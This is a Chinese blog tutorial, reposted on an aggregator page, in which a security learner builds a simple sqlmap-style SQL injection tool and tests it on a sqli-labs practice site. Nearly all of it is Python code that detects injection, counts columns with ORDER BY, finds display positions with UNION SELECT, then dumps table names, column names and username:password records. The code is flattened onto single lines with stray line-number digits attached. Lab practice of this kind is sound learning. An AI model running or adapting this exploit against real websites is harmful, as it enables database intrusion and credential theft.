江苏龙网

  1. 主页 > 生活百科 > >

网络安全初入茅庐 --- 简易 sqlmap 制作

sqlmap

前景提要学习网络安全有一段时间了 , 用惯了其他人编写的工具 , 决心自己写一个入门级别比较简单的小工具自己使用练习 。
运行演示

  1. 进入一个 sqli-lab 的靶场当作测试网站 。

网络安全初入茅庐 --- 简易 sqlmap 制作

文章插图
 
2.获取其 url 地址:https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1
3.运行程序
网络安全初入茅庐 --- 简易 sqlmap 制作

文章插图
 
代码解析
  1. 首先检测网站是否存在 sql 注入 , 通过闭合单双引号以及布尔判断检测
def can_inject(text_url):text_list = ["%27","%22"]for item in text_list:target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"result1 = send_request(target_url1)result2 = send_request(target_url2)soup1 = BeautifulSoup(result1,'html.parser')fonts1 = soup1.find_all('font')content1 = str(fonts1[2].text)soup2 = BeautifulSoup(result2,'html.parser')fonts2 = soup2.find_all('font')content2 = str(fonts2[2].text)if content1.find('Login') != -1 and content2 is None or content2.strip() is '':log('使用' + item + "发现数据库漏洞")return True,itemelse:log('使用' + item + "未发现数据库漏洞")return False,None123456789101112131415161718
  1. 如果检测出存在 sql 注入漏洞的话 , 通过 order by 检测字段列数
def text_order_by(url,symbol):flag = 0for i in range(1,100):log('正在查找字段' + str(i))text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"result = send_request(text_url)soup = BeautifulSoup(result,'html.parser')fonts = soup.find_all('font')content = str(fonts[2].text)if content.find('Login') == -1:log('获取字段成功 -> ' + str(i) + "个字段")flag = ibreakreturn flag1234567891011121314
  1. 拿到每个字段后根据 union_select 联合查询检测可视化位置和字段位置
def text_union_select(url,symbol,flag):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" + symbol + "%20union%20select%20"for i in range(1,flag):if i == flag - 1:text_url += str(i) + "%20--+"else:text_url += str(i) + ","result = send_request(text_url)soup = BeautifulSoup(result,'html.parser')fonts = soup.find_all('font')content = str(fonts[2].text)for i in range(1,flag):if content.find(str(i)) != -1:temp_list = content.split(str(i))return i,temp_list1234567891011121314
  1. 通过访问网页找到网页内容获取数据库名
def get_database(url,symbol):text_url = url + symbol + "aaaaaaaaa"result = send_request(text_url)if result.find('MySQL') != -1:return "MySQL"elif result.find('Oracle') != -1:return "Oracle"12345
  1. 获取数据表名
def get_tables(url,symbol,flag,index,temp_list):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" +symbol + "%20union%20select%20"for i in range(1,flag):if i == index:text_url += "group_concat(table_name)" + ","elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"else:text_url += str(i) + ","result = send_request(text_url)soup = BeautifulSoup(result,'html.parser')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]123456789101112
  1. 获取字段名
def get_columns(url,symbol,flag,index,temp_list):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" +symbol + "%20union%20select%20"for i in range(1,flag):if i == index:text_url += "group_concat(column_name)" + ","elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.columns%20where%20""table_name='users'%20and%20table_schema=database()%20--+"else:text_url += str(i) + ','result = send_request(text_url)soup = BeautifulSoup(result,'html.parser')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]1234567891011121314
  1. 获取字段内容
def get_data(url,symbol,flag,index,temp_list):prefix_url = get_prefix_url(url)text_url = prefix_url + "=0" +symbol + "%20union%20select%20"for i in range(1,flag):if i == index:text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","elif i == flag - 1:text_url += str(i) + '%20from%20users%20--+'else:text_url += str(i) + ","result = send_request(text_url)soup = BeautifulSoup(result,'html.parser')fonts = soup.find_all('font')content = str(fonts[2].text)return content.split(temp_list[0])[1].split(temp_list[1])[0]123456789101112


推荐阅读


上一篇:8 种用于前端性能分析工具

下一篇:Power Query 网络抓取概括性总结